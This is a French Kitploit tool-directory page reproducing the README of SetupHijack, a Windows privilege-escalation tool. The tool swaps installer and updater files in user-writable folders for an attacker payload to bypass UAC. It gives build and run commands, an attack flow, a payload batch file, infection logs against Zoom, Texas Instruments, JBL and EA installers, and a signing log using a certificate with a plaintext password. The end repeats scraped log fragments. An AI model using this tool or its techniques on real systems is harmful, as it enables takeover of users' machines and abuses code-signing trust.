Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SetupHijack — SetupHijack is a security research tool that exploits race conditions and insecure file handling in Windows applications installer and update processes. | Kitploit
Outils/GitHubGitHub/hackerhouse-opensource/setuphijack
Privilege EscalationPayload GenerationExploitationLateral MovementPenetration TestingRed Teaming
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack is a security research tool that exploits race conditions and insecure file handling in Windows applications installer and update processes.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
26429il y a 6 moisVérifié par Kitploit

SetupHijack


Aperçu

SetupHijack est un outil de recherche en sécurité qui exploite des conditions de concurrence et une gestion non sécurisée des fichiers dans les processus d'installation et de mise à jour de Windows. Il cible les scénarios où des installateurs ou programmes de mise à jour privilégiés déposent des fichiers dans %TEMP% ou d'autres emplacements accessibles en écriture par tous, permettant à un attaquant de remplacer ces fichiers avant qu'ils ne soient exécutés avec des privilèges élevés.

  • Ne requiert pas de permissions élevées pour s'exécuter.
  • N'utilise pas de notifications du système de fichiers (il interroge plutôt les modifications).
  • Exploite les faiblesses de la signature de code Authenticode et des modèles de confiance des installateurs.
  • Peut infecter les fichiers .exe, .msi et les fichiers batch (par exemple, sysinfo, netstat, ipconfig).
  • Conçu uniquement pour une utilisation en red team, en tests d'intrusion et en recherche en sécurité.

L'utilisation prévue de cet outil est de s'exécuter en arrière-plan sur un compte utilisateur compromis disposant de privilèges, afin d'élever un autre processus en détournant les fichiers déposés par les installateurs/programmes de mise à jour.

Le graphique ci-dessous présente des cas d'utilisation réels de cette exploitation dans plusieurs scénarios pouvant être utilisés pour contourner l'UAC. Les contournements de l'UAC sont considérés comme une limite de sécurité lors d'une exécution sous Adminless et constituent une « exigence courante de l'attaquant » pour désactiver les contrôles de sécurité. L'exploitation des opérations administrateur privilégiées offre une accessibilité générique d'exploitation aux codes malveillants pour effectuer un chargement latéral ou élever les privilèges de processus. Cet outil peut être utilisé pour identifier d'autres applications exposées aux mêmes types de risque ; un attaquant peut attendre l'exécution de ces processus afin d'obtenir des droits élevés sans perturber les comportements des utilisateurs.

Graphique de découverte des vulnérabilités de SetupHijack

Comment ça fonctionne

  1. SetupHijack analyse en continu %TEMP% (et ses sous-répertoires) à la recherche de nouveaux fichiers d'installation ou de fichiers modifiés.
  2. Lorsqu'un fichier cible est détecté, il est remplacé par une charge utile fournie par l'utilisateur (EXE, MSI ou BAT), en conservant éventuellement l'original comme fichier .bak.
  3. Si le processus privilégié exécute le fichier remplacé avant les contrôles d'intégrité, la charge utile s'exécute avec des droits élevés (par exemple, SYSTEM ou Administrateur).
  4. L'outil journalise toutes les actions et maintient une skiplist pour éviter de réinfecter les mêmes fichiers.

Note sur la signature de code

Ce projet utilise un processus de signature de code modifié avec SignToolEx.exe et SignToolExHook.dll pour signer les charges utiles et les installateurs. L'utilisation de certificats de signature de code valides et d'un horodatage Authenticode augmentera votre taux de réussite lors du contournement des contrôles de confiance des installateurs et du système d'exploitation.


Utilisation

Compilation```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### Exécuter (Options)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • Exécutez SetupHijack.exe avant ou pendant un processus d’installation/mise à jour privilégié.
  • Par défaut, l’outil analyse tous les emplacements de dépôt courants : %TEMP%, %APPDATA% et %USERPROFILE%\Downloads.
  • Vous pouvez désactiver n’importe quel emplacement avec les options -notemp, -noappdata ou -nodownloads.
  • L’option clean restaure les sauvegardes dans tous les emplacements activés. L’option verbose journalise toutes les actions.
  • Pour l’escalade à distance, utilisez-le avec shadow.exe ou des outils similaires sur Terminal Services.

Exemple de flux d’attaque

  1. Construisez votre payload et SetupHijack : ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. Démarrer SetupHijack: ```sh SetupHijack.exe
    root@kitploit:~
  3. Lancez l'installateur cible ou le processus de mise à jour en tant qu'administrateur.
  4. Si l'installateur dépose des fichiers dans %TEMP% et les exécute avec des droits élevés, votre charge utile sera substituée et exécutée.

Exemple de sortie

Voici un exemple réel de construction et d'exécution de SetupHijack, y compris la signature de code et la sortie d'infection :``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## Exemple d'utilisation pour déployer un implant

Voici une capture d'écran montrant SetupHijack en action, déployant un implant lors d'une exécution d'installateur avec privilèges :

![Exemple d'utilisation pour déployer un implant](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## Notes de sécurité

- Cet outil est réservé aux tests et recherches autorisés.
- L'exploitation de ces faiblesses peut entraîner une compromission complète du système lorsque l'utilisateur est dans le groupe Administrateur.
- Les installateurs peuvent utiliser des contrôles de hachage/signature qui bloqueront cette attaque, mais beaucoup ne le font toujours pas.
- Utilisez toujours dans un environnement contrôlé.
- Si vous découvrez une CVE ou obtenez une prime avec cet outil, créditez-nous !

Cibler un seul répertoire (comme `%TEMP%`) à la fois peut augmenter les chances de gagner une course de type temps-de-création/temps-d'utilisation (TOCTOU), car cela permet une interrogation plus rapide et moins de contention. Pour une fiabilité maximale, exécutez plusieurs instances de SetupHijack, chacune concentrée sur un seul répertoire. Pour des résultats optimaux, assurez-vous que votre charge utile (l'EXE que vous voulez exécuter avec élévation) inclut un manifeste demandant l'élévation (requireAdministrator), et est signée avec un certificat de signature de code valide comprenant un horodatage Authenticode. Cela augmente les chances de contourner les contrôles de confiance de l'installateur et du système d'exploitation sur les installateurs.

## Vulnérabilités identifiées

La liste non exhaustive suivante a été identifiée avec les « meilleurs scénarios » consistant à exécuter des .MSI non fiables aboutissant à « NT AUTHORITY\SYSTEM », mais de nombreux processus « élevés par UAC » s'exécuteront souvent via des fichiers .bat. Parce que l'exécution se produit sous le même SID utilisateur, comme %TEMP% est unique au SID utilisateur construit sous %USERPROFILE% dans le cadre de la création de session interne, vous pouvez élever, au sein de commandes de même session, vers une intégrité élevée et des autorisations complètes en manipulant le .bat qui hérite des droits du processus parent. « Temporary File Elevated Command Execution » est un résultat courant - qui peut être utilisé pour le contournement d'UAC et l'exécution sans compte administrateur, car l'invite utilisateur sur le bureau sécurisé montre l'application exploitée (par exemple une mise à jour Zoom).

- Zoom 6.6.1 (15968) utilise %AppData% pour l'installation et les mises à jour .exe, permettant un mouvement latéral des processus et
  l'usurpation de processus (par exemple, envoyer une demande d'élévation depuis la mise à jour Zoom). Les exécutables peuvent être facilement manipulés
  pour des attaques de vol d'identifiants et à des fins malveillantes.```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • msiexec.exe s'exécute sous NT AUTHORITY\SYSTEM lorsqu'il lance install.msi

  • L'exe de mise à jour de Wireshark passe par %Temp%, n'a pas gagné la course.

  • Les vérifications de signature de code de Visual Studio sur les mises à jour empêchent l'exploitation, (légèrement testé .VSIX)

  • L'installateur Code Composer de Texas Instrument peut être exploité pour contourner l'authentification UAC 09/25/2025. (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1

root@kitploit:~
- Cursor IDE a été observé en train de créer des fichiers .bat et un historique de commandes dans %TEMP% qui peuvent être exploités pour injecter
  des commandes dans l'historique de Cursor, avec une élévation limitée. 


- JBL Quantum Engine contient une faille d'injection de commande (désormais corrigée) qui exécute "net" (y compris .bat) depuis le
  même répertoire que celui depuis lequel JBL_QuantumENGINE_1.11.0.1511_x64 est exécuté. La dernière version utilise un nouvel installateur qui
  n'est pas vulnérable à cette faille d'injection de commande spécifique (JBL_QuantumENGINE_Installer_2.2.13_x64.exe). Ce
  problème a été découvert comme 0day en novembre 2022. Il peut être utilisé pour contourner les restrictions UAC et obtenir des droits
  d'administrateur élevés. Le service SYSTEM écrit des fichiers .bat sous %TEMP% pour le débogage/diagnostic. ;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports "EA Anti-Cheat Installer" : exécution arbitraire de commandes avec élévation de privilèges. Les titres EA tels que "skate." installent un service anti-triche qui utilise un emplacement temporaire et inscriptible par l'utilisateur. Un attaquant peut remplacer EAAntiCheat.Installer.exe pendant l'installation STEAM, et une invite d'élévation UAC proviendra du moteur STEAM, avec le logo et l'icône de Valve, mais exécutera votre exe de charge utile avec des privilèges élevés. Voir les captures d'écran EASkateUAC pour une utilisation dans les attaques de contournement UAC(confusion?).``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# Licence

Ces fichiers sont disponibles sous la licence BSD à 3 clauses.
Télécharger l’outil
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS